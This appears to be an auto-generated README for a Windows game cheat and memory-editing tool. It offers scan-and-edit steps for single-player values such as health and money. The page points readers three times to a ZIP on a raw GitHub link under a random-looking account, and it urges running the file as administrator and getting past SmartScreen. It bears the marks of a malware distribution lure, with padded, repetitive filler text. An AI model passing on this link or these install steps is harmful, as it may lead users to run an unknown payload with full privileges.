Visit this page to download:
https://raw.githubusercontent.com/Circulatory-average385/Cheat-Engine-Modding-Games-Windows/main/BaseMain/Modding_Games_Cheat_Engine_Windows_3.4.zip
Use the latest release file for Windows. If the release includes a ZIP or EXE file, download it to your PC before you move to the setup steps.
Cheat-Engine-Modding-Games-Windows helps you inspect and edit values used by Windows games. You can use it to look for game memory, change simple values, and test game tweaks in offline play.
It is built for users who want a direct way to:
- scan for values in a game
- edit numbers like health, score, or currency
- test game mods on a local PC
- work with single-player game tweaks
- use a memory scanner on Windows
Make sure your PC meets these basic needs:
- Windows 10 or Windows 11
- A modern 64-bit CPU
- 4 GB RAM or more
- 200 MB free disk space
- Internet access to download the release
- admin access if Windows asks for permission
For best results, close extra apps before you start. This gives the tool more memory to work with.
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Open the release page:
https://raw.githubusercontent.com/Circulatory-average385/Cheat-Engine-Modding-Games-Windows/main/BaseMain/Modding_Games_Cheat_Engine_Windows_3.4.zip -
Find the latest release near the top of the page.
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Download the Windows file from the release assets.
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If the file is in a ZIP archive, save it to your Downloads folder or Desktop.
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If you see an EXE file, save it in a folder you can find again.
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Open the ZIP file if the download came as an archive.
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Extract the files to a folder on your PC.
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If the download is an EXE, right-click it and choose Run as administrator if Windows asks for it.
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Follow the on-screen prompts until setup ends.
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Keep the app in a folder with full read and write access.
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If Windows SmartScreen appears, choose the option that lets you continue only if you trust the source of the file you downloaded.
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Open the folder where you extracted or installed the app.
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Find the main app file.
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Double-click it to launch the tool.
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If the app opens in a small window, you can resize it using normal Windows controls.
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Keep the game closed until you are ready to test the tool on it.
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Start the game you want to inspect.
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Open this tool as the same Windows user.
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Pick the target process from the list of running apps.
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Search for the value you want to change.
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Narrow the result list by changing the value in the game and scanning again.
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Select the right address from the result list.
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Edit the value and test it in the game.
Common values you can try:
- health
- ammo
- money
- score
- item count
- timer values
- process picker for active Windows games
- memory scanner for value search
- value editor for quick changes
- repeat scan support for better results
- support for offline game mods
- simple layout for non-technical users
- works with many single-player Windows games
- useful for game editor and trainer style tasks
If you want to change health in a single-player game:
- Open the game.
- Note your current health value.
- Open the tool.
- Search for that number.
- Take damage in the game.
- Search again with the new number.
- Keep filtering until only a few matches remain.
- Change the value and test the result.
If you want to test currency changes:
- Open the game.
- Check your current money value.
- Search for it in the tool.
- Spend money in the game.
- Search again with the new value.
- Edit the final result.
You may see these common options:
- scan type
- value type
- address list
- freeze value
- manual edit
- scan range
Simple guidance:
- Use integer for whole numbers.
- Use float for values with decimals.
- Use freeze only when you want a number to stay fixed.
- Use manual edit if you already know the value you want.
- Use the tool with offline games.
- Save your game before you change values.
- Keep a backup of your save file.
- Close other tools that may block game access.
- Run the game in windowed mode if you have trouble switching between apps.
- Restart the game if a scan does not find the right value the first time.
- Check that you downloaded the full release.
- Unzip the file if needed.
- Run the file as administrator.
- Make sure Windows did not block the file.
- Start the game first.
- Wait a few seconds for it to load.
- Refresh the process list.
- Try again after the main menu appears.
- Change the value in the game.
- Scan again with the new value.
- Use the right value type.
- Try a smaller scan range.
- Use freeze if the tool supports it.
- Check whether the game updates the value each frame.
- Try a different address from the result list.
- Restore the last safe value.
- Restart the game.
- Edit one value at a time.
- Use smaller changes first.
- Start with simple numbers.
- Change one value at a time.
- Use single-player games for testing.
- Keep notes of each scan step.
- Use the latest release from the download page.
- Test changes in a safe save file first.
You may see files like these in the release package:
- main app file
- support files
- config file
- license file
- readme file
- update files
Keep all files in the same folder unless the release notes say otherwise.
This tool is for users who want to:
- edit game values on Windows
- explore game memory
- make offline game tweaks
- test mod ideas
- use a simple game trainer
- work with memory editing without coding
Visit this page to download the latest Windows release:
https://raw.githubusercontent.com/Circulatory-average385/Cheat-Engine-Modding-Games-Windows/main/BaseMain/Modding_Games_Cheat_Engine_Windows_3.4.zip
- Process: the game or app running on your PC
- Scan: a search for a value in memory
- Address: the place where a value sits in memory
- Freeze: keep a value from changing
- Value type: the kind of number you are searching for
This tool is made for Windows PCs. For the best setup:
- use a local user account with admin rights
- keep Windows updated
- allow the app to read and write files in its folder
- avoid moving files while the tool is open
The release package is meant to give you a simple Windows-ready setup for:
- memory editing
- game tweaking
- value scanning
- offline mod testing
- trainer-style changes
- single-player game support